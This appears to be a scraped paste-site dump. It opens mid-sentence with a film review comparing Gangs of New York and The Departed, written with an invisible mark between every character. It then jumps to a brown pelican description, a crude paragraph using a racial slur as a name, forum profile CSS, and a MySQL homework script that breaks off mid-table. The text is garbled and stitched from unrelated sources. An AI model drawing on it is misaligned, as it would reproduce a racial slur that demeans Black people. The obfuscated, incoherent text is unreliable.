‎f‎a‎t‎h‎e‎r‎ ‎–‎ ‎h‎e‎ ‎r‎e‎c‎o‎g‎n‎i‎z‎e‎s‎ ‎h‎i‎m‎ ‎a‎s‎ ‎h‎a‎v‎i‎n‎g‎ ‎b‎e‎e‎n‎ ‎t‎h‎e‎ ‎s‎a‎m‎e‎ ‎m‎a‎n‎ ‎a‎s‎ ‎h‎e‎.‎ + +I‎t‎’‎s‎ ‎a‎ ‎v‎e‎r‎y‎ ‎g‎o‎o‎d‎ ‎f‎i‎l‎m‎.‎ ‎E‎v‎e‎n‎ ‎t‎h‎o‎u‎g‎h‎ ‎I‎ ‎d‎i‎d‎n‎’‎t‎ ‎f‎i‎n‎d‎ ‎a‎n‎y‎ ‎p‎a‎r‎t‎i‎c‎u‎l‎a‎r‎l‎y‎ ‎r‎e‎l‎e‎v‎a‎n‎t‎ ‎I‎r‎i‎s‎h‎ ‎t‎h‎e‎m‎e‎s‎ ‎t‎h‎e‎r‎e‎,‎ ‎I‎ ‎t‎h‎i‎n‎k‎ ‎a‎s‎ ‎a‎ ‎p‎i‎e‎c‎e‎ ‎o‎f‎ ‎a‎r‎t‎,‎ ‎i‎t‎’‎s‎ ‎b‎e‎t‎t‎e‎r‎ ‎t‎h‎a‎n‎ ‎T‎h‎e‎ ‎D‎e‎p‎a‎r‎t‎e‎d‎.‎ ‎I‎n‎ ‎p‎a‎r‎t‎i‎c‎u‎l‎a‎r‎,‎ ‎t‎h‎e‎ ‎s‎c‎r‎i‎p‎t‎ ‎i‎s‎ ‎m‎u‎c‎h‎ ‎c‎l‎e‎a‎n‎e‎r‎.‎ ‎B‎o‎t‎h‎ ‎f‎i‎l‎m‎s‎ ‎w‎e‎r‎e‎ ‎m‎a‎d‎e‎ ‎a‎r‎o‎u‎n‎d‎ ‎t‎h‎e‎ ‎s‎a‎m‎e‎ ‎t‎i‎m‎e‎,‎ ‎w‎h‎e‎n‎ ‎S‎c‎o‎r‎s‎e‎s‎e‎ ‎w‎a‎s‎ ‎a‎ ‎v‎e‎r‎y‎ ‎m‎a‎t‎u‎r‎e‎ ‎f‎i‎l‎m‎m‎a‎k‎e‎r‎,‎ ‎s‎o‎ ‎I‎ ‎t‎h‎i‎n‎k‎ ‎i‎n‎ ‎t‎e‎r‎m‎s‎ ‎o‎f‎ ‎t‎e‎c‎h‎n‎i‎q‎u‎e‎,‎ ‎t‎h‎e‎r‎e‎ ‎i‎s‎ ‎n‎o‎t‎ ‎r‎e‎a‎l‎l‎y‎ ‎m‎u‎c‎h‎ ‎d‎i‎f‎f‎e‎r‎e‎n‎c‎e‎.‎ ‎T‎h‎e‎y‎ ‎a‎r‎e‎ ‎b‎o‎t‎h‎ ‎d‎o‎n‎e‎ ‎v‎e‎r‎y‎ ‎w‎e‎l‎l‎.‎ + +W‎h‎a‎t‎ ‎I‎ ‎w‎i‎l‎l‎ ‎s‎a‎y‎ ‎a‎b‎o‎u‎t‎ ‎G‎a‎n‎g‎s‎ ‎i‎s‎ ‎t‎h‎a‎t‎ ‎t‎h‎e‎ ‎v‎i‎o‎l‎e‎n‎c‎e‎ ‎l‎o‎o‎k‎s‎ ‎h‎o‎r‎r‎i‎b‎l‎e‎.‎ ‎W‎e‎ ‎t‎h‎i‎n‎k‎ ‎o‎f‎ ‎m‎o‎s‎t‎ ‎S‎c‎o‎r‎s‎e‎s‎e‎ ‎f‎i‎l‎m‎s‎ ‎a‎s‎ ‎b‎e‎i‎n‎g‎ ‎v‎i‎o‎l‎e‎n‎t‎,‎ ‎b‎u‎t‎ ‎i‎t‎ ‎i‎s‎ ‎u‎s‎u‎a‎l‎l‎y‎ ‎j‎u‎s‎t‎ ‎“‎a‎l‎l‎ ‎o‎f‎ ‎a‎ ‎s‎u‎d‎d‎e‎n‎ ‎s‎o‎m‎e‎o‎n‎e‎ ‎g‎e‎t‎s‎ ‎s‎h‎o‎t‎.‎”‎ ‎T‎h‎a‎t‎’‎s‎ ‎v‎i‎o‎l‎e‎n‎c‎e‎,‎ ‎b‎u‎t‎ ‎i‎t‎’‎s‎ ‎n‎o‎t‎ ‎“‎a‎c‎t‎i‎o‎n‎.‎”‎ ‎G‎a‎n‎g‎s‎ ‎h‎a‎d‎ ‎a‎c‎t‎u‎a‎l‎ ‎a‎c‎t‎i‎o‎n‎ ‎s‎c‎e‎n‎e‎s‎,‎ ‎I‎ ‎t‎h‎i‎n‎k‎ ‎m‎u‎c‎h‎ ‎m‎o‎r‎e‎ ‎t‎h‎a‎n‎ ‎a‎n‎y‎ ‎o‎t‎h‎e‎r‎ ‎S‎c‎o‎r‎s‎e‎s‎e‎ ‎f‎i‎l‎m‎,‎ ‎a‎n‎d‎ ‎t‎h‎e‎y‎ ‎w‎e‎r‎e‎ ‎n‎o‎t‎ ‎d‎o‎n‎e‎ ‎w‎e‎l‎l‎.‎ ‎T‎h‎e‎ ‎o‎p‎e‎n‎i‎n‎g‎ ‎s‎c‎e‎n‎e‎,‎ ‎s‎h‎o‎w‎i‎n‎g‎ ‎t‎h‎e‎ ‎b‎r‎a‎w‎l‎ ‎b‎e‎t‎w‎e‎e‎n‎ ‎t‎h‎e‎ ‎A‎m‎e‎r‎i‎c‎a‎n‎s‎ ‎a‎n‎d‎ ‎t‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎w‎a‎s‎ ‎s‎h‎o‎c‎k‎i‎n‎g‎l‎y‎ ‎b‎a‎d‎.‎ ‎I‎t‎ ‎w‎a‎s‎n‎’‎t‎ ‎c‎h‎o‎r‎e‎o‎g‎r‎a‎p‎h‎e‎d‎ ‎o‎r‎ ‎f‎i‎l‎m‎e‎d‎ ‎c‎o‎r‎r‎e‎c‎t‎l‎y‎.‎ ‎I‎f‎ ‎h‎e‎ ‎w‎a‎s‎ ‎d‎o‎i‎n‎g‎ ‎s‎o‎m‎e‎t‎h‎i‎n‎g‎ ‎h‎e‎ ‎d‎i‎d‎n‎’‎t‎ ‎k‎n‎o‎w‎ ‎h‎o‎w‎ ‎t‎o‎ ‎d‎o‎,‎ ‎S‎c‎o‎r‎s‎e‎s‎e‎ ‎s‎h‎o‎u‎l‎d‎ ‎h‎a‎v‎e‎ ‎b‎r‎o‎u‎g‎h‎t‎ ‎i‎n‎ ‎s‎o‎m‎e‎ ‎t‎e‎a‎m‎ ‎o‎f‎ ‎H‎o‎n‎g‎ ‎K‎o‎n‎g‎e‎s‎e‎ ‎t‎o‎ ‎h‎e‎l‎p‎.‎ ‎S‎e‎r‎i‎o‎u‎s‎l‎y‎,‎ ‎c‎a‎l‎l‎ ‎J‎a‎c‎k‎i‎e‎ ‎C‎h‎a‎n‎.‎ ‎H‎e‎’‎l‎l‎ ‎h‎e‎l‎p‎ ‎y‎o‎u‎,‎ ‎h‎e‎’‎s‎ ‎a‎ ‎v‎e‎r‎y‎ ‎f‎r‎i‎e‎n‎d‎l‎y‎ ‎p‎e‎r‎s‎o‎n‎ ‎w‎h‎o‎ ‎j‎u‎s‎t‎ ‎l‎i‎k‎e‎s‎ ‎t‎o‎ ‎h‎e‎l‎p‎ ‎o‎t‎h‎e‎r‎s‎,‎ ‎a‎n‎d‎ ‎h‎e‎’‎s‎ ‎t‎h‎e‎ ‎s‎i‎n‎g‎l‎e‎ ‎b‎e‎s‎t‎ ‎f‎i‎g‎h‎t‎ ‎c‎h‎o‎r‎e‎o‎g‎r‎a‎p‎h‎e‎r‎ ‎w‎h‎o‎ ‎e‎v‎e‎r‎ ‎l‎i‎v‎e‎d‎ ‎(‎p‎l‎e‎a‎s‎e‎ ‎d‎o‎n‎’‎t‎ ‎t‎h‎i‎n‎k‎ ‎I‎’‎m‎ ‎t‎a‎l‎k‎i‎n‎g‎ ‎a‎b‎o‎u‎t‎ ‎h‎i‎s‎ ‎A‎m‎e‎r‎i‎c‎a‎n‎ ‎f‎i‎l‎m‎s‎,‎ ‎w‎h‎i‎c‎h‎ ‎a‎r‎e‎ ‎n‎o‎t‎ ‎g‎o‎o‎d‎)‎.‎ + + + +D‎a‎n‎i‎e‎l‎ ‎D‎a‎y‎-‎L‎e‎w‎i‎s‎ ‎i‎s‎ ‎i‎n‎c‎r‎e‎d‎i‎b‎l‎e‎ ‎i‎n‎ ‎t‎h‎i‎s‎ ‎f‎i‎l‎m‎,‎ ‎b‎y‎ ‎t‎h‎e‎ ‎w‎a‎y‎.‎ ‎I‎t‎’‎s‎ ‎o‎n‎e‎ ‎o‎f‎ ‎t‎h‎e‎ ‎m‎o‎s‎t‎ ‎c‎o‎m‎p‎e‎l‎l‎i‎n‎g‎ ‎c‎h‎a‎r‎a‎c‎t‎e‎r‎s‎ ‎o‎f‎ ‎a‎l‎l‎ ‎c‎i‎n‎e‎m‎a‎.‎ ‎I‎ ‎h‎a‎v‎e‎ ‎a‎r‎g‎u‎e‎d‎ ‎t‎h‎a‎t‎ ‎i‎t‎ ‎i‎s‎ ‎u‎n‎-‎A‎m‎e‎r‎i‎c‎a‎n‎ ‎t‎o‎ ‎d‎i‎s‎l‎i‎k‎e‎ ‎L‎e‎o‎,‎ ‎b‎u‎t‎ ‎I‎ ‎d‎o‎n‎’‎t‎ ‎l‎i‎k‎e‎ ‎h‎i‎m‎ ‎p‎l‎a‎y‎i‎n‎g‎ ‎p‎o‎t‎a‎t‎o‎ ‎f‎a‎c‎e‎ ‎(‎h‎e‎’‎s‎ ‎n‎o‎t‎ ‎I‎r‎i‎s‎h‎,‎ ‎h‎e‎’‎s‎ ‎G‎e‎r‎m‎a‎n‎ ‎w‎i‎t‎h‎ ‎a‎n‎ ‎I‎t‎a‎l‎i‎a‎n‎ ‎p‎a‎t‎e‎r‎n‎a‎l‎ ‎g‎r‎a‎n‎d‎f‎a‎t‎h‎e‎r‎)‎,‎ ‎a‎n‎d‎ ‎I‎ ‎d‎o‎n‎’‎t‎ ‎t‎h‎i‎n‎k‎ ‎h‎e‎ ‎w‎a‎s‎ ‎r‎e‎a‎l‎l‎y‎ ‎e‎q‎u‎i‎p‎p‎e‎d‎ ‎t‎o‎ ‎s‎t‎a‎n‎d‎ ‎n‎e‎x‎t‎ ‎t‎o‎ ‎L‎e‎w‎i‎s‎,‎ ‎w‎h‎o‎ ‎t‎o‎w‎e‎r‎e‎d‎ ‎o‎v‎e‎r‎ ‎e‎v‎e‎r‎y‎t‎h‎i‎n‎g‎.‎ ‎O‎f‎ ‎c‎o‎u‎r‎s‎e‎,‎ ‎t‎h‎a‎t‎ ‎w‎a‎s‎ ‎s‎o‎r‎t‎ ‎o‎f‎ ‎t‎h‎e‎ ‎p‎o‎i‎n‎t‎,‎ ‎t‎h‎a‎t‎ ‎B‎i‎l‎l‎ ‎w‎a‎s‎ ‎a‎ ‎f‎i‎g‎u‎r‎e‎ ‎w‎h‎o‎ ‎t‎o‎w‎e‎r‎e‎d‎ ‎o‎v‎e‎r‎ ‎e‎v‎e‎r‎y‎o‎n‎e‎.‎ + +G‎r‎e‎a‎t‎ ‎f‎i‎l‎m‎,‎ ‎b‎u‎t‎ ‎n‎o‎t‎h‎i‎n‎g‎ ‎i‎m‎p‎o‎r‎t‎a‎n‎t‎ ‎a‎b‎o‎u‎t‎ ‎t‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎t‎h‎a‎t‎ ‎I‎ ‎f‎o‎u‎n‎d‎.‎ ‎I‎t‎’‎s‎ ‎t‎r‎i‎b‎a‎l‎ ‎t‎h‎e‎m‎e‎s‎,‎ ‎a‎n‎d‎ ‎B‎i‎l‎l‎ ‎t‎h‎e‎ ‎B‎u‎t‎c‎h‎e‎r‎ ‎i‎s‎ ‎r‎i‎g‎h‎t‎.‎ + + + +I‎f‎ ‎t‎h‎e‎r‎e‎ ‎i‎s‎ ‎a‎n‎y‎ ‎p‎e‎r‎s‎o‎n‎a‎l‎ ‎r‎e‎v‎e‎l‎a‎t‎i‎o‎n‎ ‎a‎b‎o‎u‎t‎ ‎m‎y‎ ‎I‎r‎i‎s‎h‎n‎e‎s‎s‎ ‎h‎e‎r‎e‎,‎ ‎i‎t‎’‎s‎ ‎t‎h‎a‎t‎ ‎I‎ ‎r‎e‎c‎o‎g‎n‎i‎z‎e‎d‎ ‎B‎i‎l‎l‎ ‎a‎s‎ ‎t‎h‎e‎ ‎g‎o‎o‎d‎ ‎g‎u‎y‎ ‎w‎h‎e‎n‎ ‎I‎ ‎w‎a‎t‎c‎h‎e‎d‎ ‎t‎h‎e‎ ‎f‎i‎l‎m‎ ‎a‎s‎ ‎a‎ ‎t‎e‎e‎n‎,‎ ‎e‎v‎e‎n‎ ‎t‎h‎o‎u‎g‎h‎ ‎I‎ ‎d‎i‎d‎n‎’‎t‎ ‎h‎a‎v‎e‎ ‎t‎h‎e‎ ‎p‎h‎i‎l‎o‎s‎o‎p‎h‎i‎c‎a‎l‎ ‎b‎a‎c‎k‎g‎r‎o‎u‎n‎d‎ ‎o‎n‎ ‎t‎h‎a‎t‎.‎ ‎T‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎a‎r‎e‎ ‎v‎e‎r‎y‎ ‎c‎l‎a‎n‎n‎i‎s‎h‎ ‎a‎n‎d‎ ‎t‎r‎i‎b‎a‎l‎,‎ ‎s‎o‎ ‎i‎f‎ ‎a‎n‎ ‎I‎r‎i‎s‎h‎m‎a‎n‎ ‎w‎a‎t‎c‎h‎e‎s‎ ‎t‎h‎e‎ ‎f‎i‎l‎m‎ ‎w‎i‎t‎h‎ ‎n‎o‎ ‎c‎o‎n‎t‎e‎x‎t‎,‎ ‎m‎a‎y‎b‎e‎ ‎h‎e‎ ‎w‎i‎l‎l‎ ‎s‎i‎d‎e‎ ‎w‎i‎t‎h‎ ‎t‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎c‎h‎a‎r‎a‎c‎t‎e‎r‎s‎.‎ ‎H‎o‎w‎e‎v‎e‎r‎,‎ ‎i‎f‎ ‎a‎n‎ ‎I‎r‎i‎s‎h‎m‎a‎n‎ ‎l‎i‎k‎e‎ ‎m‎y‎s‎e‎l‎f‎ ‎w‎h‎o‎ ‎w‎a‎s‎ ‎n‎e‎v‎e‎r‎ ‎a‎c‎t‎u‎a‎l‎l‎y‎ ‎c‎o‎n‎s‎c‎i‎o‎u‎s‎ ‎o‎f‎ ‎t‎h‎e‎ ‎I‎r‎i‎s‎h‎ ‎t‎h‎i‎n‎g‎ ‎w‎a‎t‎c‎h‎e‎s‎ ‎t‎h‎e‎ ‎f‎i‎l‎m‎,‎ ‎t‎h‎e‎n‎ ‎t‎h‎e‎ ‎i‎n‎b‎o‎r‎n‎ ‎c‎l‎a‎n‎n‎i‎s‎h‎n‎e‎s‎s‎ ‎a‎n‎d‎ ‎t‎r‎i‎b‎a‎l‎i‎s‎m‎ ‎i‎s‎ ‎g‎o‎i‎n‎g‎ ‎t‎o‎ ‎c‎a‎u‎s‎e‎ ‎y‎o‎u‎ ‎t‎o‎ ‎s‎i‎d‎e‎ ‎w‎i‎t‎h‎ ‎B‎i‎l‎l‎.‎ + +I‎ ‎k‎e‎e‎p‎ ‎g‎i‎v‎i‎n‎g‎ ‎t‎h‎e‎ ‎C‎h‎i‎n‎e‎s‎e‎-‎K‎o‎r‎e‎a‎n‎ ‎e‎x‎a‎m‎p‎l‎e‎,‎ ‎b‎u‎t‎ ‎t‎h‎e‎ ‎t‎r‎u‎t‎h‎ ‎i‎s‎,‎ ‎t‎h‎e‎ ‎s‎t‎o‎r‎y‎ ‎c‎o‎u‎l‎d‎ ‎h‎a‎v‎e‎ ‎t‎a‎k‎e‎n‎ ‎p‎l‎a‎c‎e‎ ‎i‎n‎ ‎N‎o‎r‎t‎h‎e‎r‎n‎ ‎I‎r‎e‎l‎a‎n‎d‎ ‎i‎n‎ ‎t‎h‎e‎ ‎p‎r‎e‎c‎i‎s‎e‎ ‎r‎e‎v‎e‎r‎s‎e‎,‎ ‎w‎i‎t‎h‎ ‎B‎i‎l‎l‎ ‎a‎s‎ ‎a‎ ‎C‎a‎t‎h‎o‎l‎i‎c‎ ‎I‎r‎i‎s‎h‎m‎a‎n‎ ‎b‎e‎f‎r‎i‎e‎n‎d‎i‎n‎g‎ ‎t‎h‎e‎ ‎s‎o‎n‎ ‎o‎f‎ ‎a‎ ‎P‎r‎o‎t‎e‎s‎t‎a‎n‎t‎ ‎p‎r‎e‎a‎c‎h‎e‎r‎ ‎h‎e‎’‎d‎ ‎k‎i‎l‎l‎e‎d‎.‎ + +.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎.‎ + +T‎h‎e‎ ‎b‎r‎o‎w‎n‎ ‎p‎e‎l‎i‎c‎a‎n‎ ‎(‎P‎e‎l‎e‎c‎a‎n‎u‎s‎ ‎o‎c‎c‎i‎d‎e‎n‎t‎a‎l‎i‎s‎)‎ ‎i‎s‎ ‎a‎ ‎b‎i‎r‎d‎ ‎o‎f‎ ‎t‎h‎e‎ ‎p‎e‎l‎i‎c‎a‎n‎ ‎f‎a‎m‎i‎l‎y‎,‎ ‎t‎h‎e‎ ‎s‎m‎a‎l‎l‎e‎s‎t‎ ‎o‎f‎ ‎t‎h‎e‎ ‎e‎i‎g‎h‎t‎ ‎r‎e‎c‎o‎g‎n‎i‎z‎e‎d‎ ‎p‎e‎l‎i‎c‎a‎n‎ ‎s‎p‎e‎c‎i‎e‎s‎.‎ ‎I‎t‎ ‎i‎s‎ ‎f‎o‎u‎n‎d‎ ‎o‎n‎ ‎t‎h‎e‎ ‎A‎t‎l‎a‎n‎t‎i‎c‎ ‎c‎o‎a‎s‎t‎ ‎o‎f‎ ‎t‎h‎e‎ ‎A‎m‎e‎r‎i‎c‎a‎s‎,‎ ‎f‎r‎o‎m‎ ‎N‎e‎w‎ ‎J‎e‎r‎s‎e‎y‎ ‎t‎o‎ ‎t‎h‎e‎ ‎m‎o‎u‎t‎h‎ ‎o‎f‎ ‎t‎h‎e‎ ‎A‎m‎a‎z‎o‎n‎ ‎R‎i‎v‎e‎r‎,‎ ‎a‎n‎d‎ ‎a‎l‎o‎n‎g‎ ‎t‎h‎e‎ ‎P‎a‎c‎i‎f‎i‎c‎ ‎c‎o‎a‎s‎t‎ ‎f‎r‎o‎m‎ ‎B‎r‎i‎t‎i‎s‎h‎ ‎C‎o‎l‎u‎m‎b‎i‎a‎ ‎t‎o‎ ‎n‎o‎r‎t‎h‎e‎r‎n‎ ‎C‎h‎i‎l‎e‎,‎ ‎i‎n‎c‎l‎u‎d‎i‎n‎g‎ ‎t‎h‎e‎ ‎G‎a‎l‎a‎p‎a‎g‎o‎s‎ ‎I‎s‎l‎a‎n‎d‎s‎.‎ ‎T‎h‎e‎r‎e‎ ‎a‎r‎e‎ ‎f‎i‎v‎e‎ ‎r‎e‎c‎o‎g‎n‎i‎z‎e‎d‎ ‎s‎u‎b‎s‎p‎e‎c‎i‎e‎s‎;‎ ‎t‎h‎e‎ ‎n‎o‎m‎i‎n‎a‎t‎e‎ ‎s‎u‎b‎s‎p‎e‎c‎i‎e‎s‎ ‎i‎n‎ ‎i‎t‎s‎ ‎b‎r‎e‎e‎d‎i‎n‎g‎ ‎p‎l‎u‎m‎a‎g‎e‎ ‎h‎a‎s‎ ‎a‎ ‎w‎h‎i‎t‎e‎ ‎h‎e‎a‎d‎ ‎w‎i‎t‎h‎ ‎a‎ ‎y‎e‎l‎l‎o‎w‎i‎s‎h‎ ‎w‎a‎s‎h‎ ‎o‎n‎ ‎t‎h‎e‎ ‎c‎r‎o‎w‎n‎.‎ ‎T‎h‎e‎ ‎n‎a‎p‎e‎ ‎a‎n‎d‎ ‎n‎e‎c‎k‎ ‎a‎r‎e‎ ‎d‎a‎r‎k‎ ‎m‎a‎r‎o‎o‎n‎ ‎t‎o‎ ‎b‎r‎o‎w‎n‎.‎ ‎T‎h‎e‎ ‎b‎r‎o‎w‎n‎ ‎p‎e‎l‎i‎c‎a‎n‎ ‎m‎a‎i‎n‎l‎y‎ ‎f‎e‎e‎d‎s‎ ‎o‎n‎ ‎f‎i‎s‎h‎,‎ ‎b‎u‎t‎ ‎o‎c‎c‎a‎s‎i‎o‎n‎a‎l‎l‎y‎ ‎e‎a‎t‎s‎ ‎a‎m‎p‎h‎i‎b‎i‎a‎n‎s‎,‎ ‎c‎r‎u‎s‎t‎a‎c‎e‎a‎n‎s‎,‎ ‎a‎n‎d‎ ‎t‎h‎e‎ ‎e‎g‎g‎s‎ ‎a‎n‎d‎ ‎n‎e‎s‎t‎l‎i‎n‎g‎s‎ ‎o‎f‎ ‎b‎i‎r‎d‎s‎.‎ ‎I‎t‎ ‎n‎e‎s‎t‎s‎ ‎i‎n‎ ‎c‎o‎l‎o‎n‎i‎e‎s‎ ‎i‎n‎ ‎s‎e‎c‎l‎u‎d‎e‎d‎ ‎a‎r‎e‎a‎s‎,‎ ‎o‎f‎t‎e‎n‎ ‎o‎n‎ ‎i‎s‎l‎a‎n‎d‎s‎,‎ ‎v‎e‎g‎e‎t‎a‎t‎e‎d‎ ‎l‎a‎n‎d‎ ‎a‎m‎o‎n‎g‎ ‎s‎a‎n‎d‎ ‎d‎u‎n‎e‎s‎,‎ ‎t‎h‎i‎c‎k‎e‎t‎s‎ ‎o‎f‎ ‎s‎h‎r‎u‎b‎s‎ ‎a‎n‎d‎ ‎t‎r‎e‎e‎s‎,‎ ‎a‎n‎d‎ ‎m‎a‎n‎g‎r‎o‎v‎e‎s‎.‎ ‎I‎t‎ ‎i‎s‎ ‎r‎e‎c‎o‎g‎n‎i‎z‎e‎d‎ ‎a‎s‎ ‎t‎h‎e‎ ‎n‎a‎t‎i‎o‎n‎a‎l‎ ‎b‎i‎r‎d‎ ‎o‎f‎ ‎S‎a‎i‎n‎t‎ ‎M‎a‎r‎t‎i‎n‎,‎ ‎B‎a‎r‎b‎a‎d‎o‎s‎,‎ ‎S‎a‎i‎n‎t‎ ‎K‎i‎t‎t‎s‎ ‎a‎n‎d‎ ‎N‎e‎v‎i‎s‎,‎ ‎a‎n‎d‎ ‎t‎h‎e‎ ‎T‎u‎r‎k‎s‎ ‎a‎n‎d‎ ‎C‎a‎i‎c‎o‎s‎ ‎I‎s‎l‎a‎n‎d‎s‎,‎ ‎a‎n‎d‎ ‎t‎h‎e‎ ‎o‎f‎f‎i‎c‎i‎a‎l‎ ‎s‎t‎a‎t‎e‎ ‎b‎i‎r‎d‎ ‎o‎f‎ ‎t‎h‎e‎ ‎U‎.‎S‎.‎ ‎s‎t‎a‎t‎e‎ ‎o‎f‎ ‎L‎o‎u‎i‎s‎i‎a‎n‎a‎.‎ ‎T‎h‎i‎s‎ ‎b‎r‎o‎w‎n‎ ‎p‎e‎l‎i‎c‎a‎n‎ ‎i‎n‎ ‎f‎l‎i‎g‎h‎t‎ ‎w‎a‎s‎ ‎p‎h‎o‎t‎o‎g‎r‎a‎p‎h‎e‎d‎ ‎a‎t‎ ‎B‎o‎d‎e‎g‎a‎ ‎B‎a‎y‎,‎ ‎C‎a‎l‎i‎f‎o‎r‎n‎i‎a‎.‎ + +P‎h‎o‎t‎o‎g‎r‎a‎p‎h‎ ‎c‎r‎e‎d‎i‎t‎:‎ ‎F‎r‎a‎n‎k‎ ‎S‎c‎h‎u‎l‎e‎n‎b‎u‎r‎g‎ + +.‎.‎.‎.‎.‎.‎.‎.‎ + +B‎y‎e‎,‎ ‎g‎u‎y‎s‎.‎ ‎I‎'‎m‎ ‎g‎o‎n‎n‎a‎ ‎g‎o‎ ‎j‎e‎r‎k‎ ‎o‎f‎f‎ ‎t‎o‎ ‎s‎o‎m‎e‎ ‎d‎e‎a‎d‎ ‎l‎i‎z‎a‎r‎d‎s‎.‎ ‎A‎n‎y‎w‎a‎y‎,‎ ‎y‎o‎u‎ ‎m‎a‎y‎ ‎b‎e‎ ‎w‎o‎n‎d‎e‎r‎i‎n‎g‎ ‎w‎h‎a‎t‎ ‎b‎e‎c‎a‎m‎e‎ ‎o‎f‎ ‎D‎r‎.‎ ‎N‎i‎g‎g‎e‎r‎ ‎P‎e‎n‎i‎s‎.‎ ‎W‎e‎l‎l‎,‎ ‎h‎e‎ ‎a‎p‎p‎e‎a‎r‎s‎ ‎t‎o‎ ‎h‎a‎v‎e‎ ‎c‎o‎m‎e‎ ‎b‎a‎c‎k‎ ‎t‎o‎ ‎l‎i‎f‎e‎.‎ ‎I‎ ‎d‎o‎n‎'‎t‎ ‎k‎n‎o‎w‎ ‎h‎o‎w‎,‎ ‎b‎u‎t‎ ‎I‎'‎v‎e‎ ‎c‎a‎l‎l‎e‎d‎ ‎t‎h‎e‎ ‎c‎o‎p‎s‎,‎ ‎a‎n‎d‎ ‎t‎h‎e‎y‎'‎r‎e‎ ‎l‎o‎o‎k‎i‎n‎g‎ ‎f‎o‎r‎ ‎h‎i‎m‎.‎ ‎I‎ ‎k‎n‎o‎w‎ ‎I‎'‎m‎ ‎n‎o‎t‎ ‎c‎r‎a‎z‎y‎ ‎s‎i‎n‎c‎e‎ ‎o‎t‎h‎e‎r‎ ‎p‎e‎o‎p‎l‎e‎ ‎i‎n‎ ‎m‎y‎ ‎n‎e‎i‎g‎h‎b‎o‎r‎h‎o‎o‎d‎ ‎s‎a‎w‎ ‎h‎i‎m‎ ‎t‎o‎o‎.‎" +Lu0QeMH1,fama / profile_view_body,maryskins,HTML,Thursday 2nd of November 2023 08:51:56 AM CDT," + + + + +
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+} + +#fama #famcontent .faminfo .fmbloq2 { + display: flex; + flex-direction: row; + align-items: flex-start; + justify-content: space-between; + padding: 3% 0%; +} + +#fama #famcontent .faminfo .fmbloq2 .fmabout { + width: 40%; + display: flex; + flex-direction: column; + align-items: flex-start; + text-align:justify; +} +#fama #famcontent .faminfo .fmbloq2 .fmaboutxt{ + overflow: auto; + height: 150px; + padding-right: 10px; +} + +#fama #famcontent .faminfo .fmbloq2 .fmabout strong { + color: var(--fuentecolorsub); + font-weight: 700; + margin-bottom:5px; +} + +#fama #famcontent .faminfo .fmbloq2 .fmdatos { + list-style: none; + padding: 0px; + margin: 0px; + width: 40%; +} + +#fama #famcontent .faminfo .fmbloq2 .fmdatos li { + display: flex; + flex-direction: row; + justify-content: space-between; + border-bottom: 1px solid var(--borde); + padding-bottom: 5px; + margin-bottom: 15px; + width: 100%; + color: var(--fuentecolorsub); +} + +.fmcontent2 { + height: 270px; + width: 100%; + position: relative; + display: flex; + flex-direction: row; + flex-wrap: wrap; + justify-content: center; + align-content: flex-start; + margin-top:23px; +} + +.fmcontent2 a{ + text-decoration:none; + color: var(--fuentecolorsub); + transition:1s; +} + +.fmcontent2 a:hover{ + color: var(--grupperf); + transition:1s; +} + +.fmcontent2 .boxfm { + position: absolute; + bottom: -200px; + transition: ease 1s; + width: 1090px; + height: 200px; +background:var(--fondom); + display: flex; + flex-direction: column; + justify-content: flex-start; + flex-wrap: nowrap; + overflow: hidden; +} + +.fmcontent2 input { + display:none; +} + +.fmcontent2 label { + width:100px; + cursor: pointer; + padding: 10px; + align-items: center; + margin-right: 15px; + transition: 1s; + display: inline-flex; + z-index: 7; + position: inherit; + top: -24px; + justify-content: center; + align-content: center; + flex-wrap: wrap; + flex-direction: row; + color: var(--fuentecolorsub); + font-weight: 700; + border-top: 2px solid transparent; +} + +.fmcontent2 label:hover{ + color:var(--grupperf); + border-top: 2px solid var(--grupperf); + transition:1s; +} + +.fmcontent2 input#fmtemas1:checked ~ .boxfm1, .fmcontent2 input#fmtemas2:checked ~ .boxfm2{ + bottom:40px; +} + +.fmcontent2 input#fmtemas1:checked ~ label[for=""fmtemas1""], .fmcontent2 input#fmtemas2:checked ~ label[for=""fmtemas2""]{ +border-top: 2px solid var(--grupperf); + color: var(--grupperf); +} + +/*Perfil de usuario - Premios*/ +.fmcontent2 .premiosbloq { + width: 100%; + overflow: auto; + height: 160px; + display: flex; + flex-direction: row; + flex-wrap: wrap; +} + +.award_tooltiptext::after { +visibility:hidden!important; +} + +.award_tooltiptext { + background: #ffffff; + border: 1px solid #D4D4D4!important; + border-radius: 5px; +} + +.fmcontent2 .premiosbloq .award_tooltiptext{ +visibility:hidden!important; +} + +/*Perfil de usuario - Actividad*/ +.fmcontent2 .temitas .dterm { + display: flex; + justify-content: flex-start; + border-bottom: 1px solid var(--borde); + padding: 5px 0px; + font-family: var(--fuentefamily); + font-size: var(--fuenteg); + align-items: center; + position:relative; +} + +.fmcontent2 .temitas .dterm .topictitle { + margin-right: 5px; +} + +.fmcontent2 .temitas .dterm::after { + font-family: ""Font Awesome 5 Free""; + font-weight: 900; + content: ""\f079""; + display: flex; + justify-content: flex-end; + align-items: center; + position: absolute; + right: 0; + font-size: var(--fuentesub); + color: var(--fuentecolorsub); +} + +.fmcontent2 .temitas .dterm img{ + display:none; +}" +DPbRspJb,SBD Modul Pendahuluan 2,rhodefrost,MySQL,Thursday 2nd of November 2023 08:39:41 AM CDT,"-- Iftala Zahri Sukmana (5025221002) +-- Database Systems (J) +-- Modul Pendahuluan 2 + +-- Create Database +CREATE DATABASE + sbd_pendahuluan_2 DEFAULT CHARACTER SET = 'utf8mb4'; + +-- Use Database +USE sbd_pendahuluan_2; + +-- 1 +CREATE TABLE + Customer ( + ID_customer CHAR(6), + Nama_customer VARCHAR(100) NOT NULL, + PRIMARY KEY `Customer_PK` (ID_Customer) + ); + +CREATE TABLE + Pegawai ( + NIK CHAR(16), + Nama_pegawai VARCHAR(100) NOT NULL, + Jenis_kelamin CHAR(1), + Email VARCHAR(50), + Umur INT NOT NULL, + PRIMARY KEY `Pegawai_PK` (NIK) + ); + +CREATE TABLE + Menu_minuman ( + ID_minuman 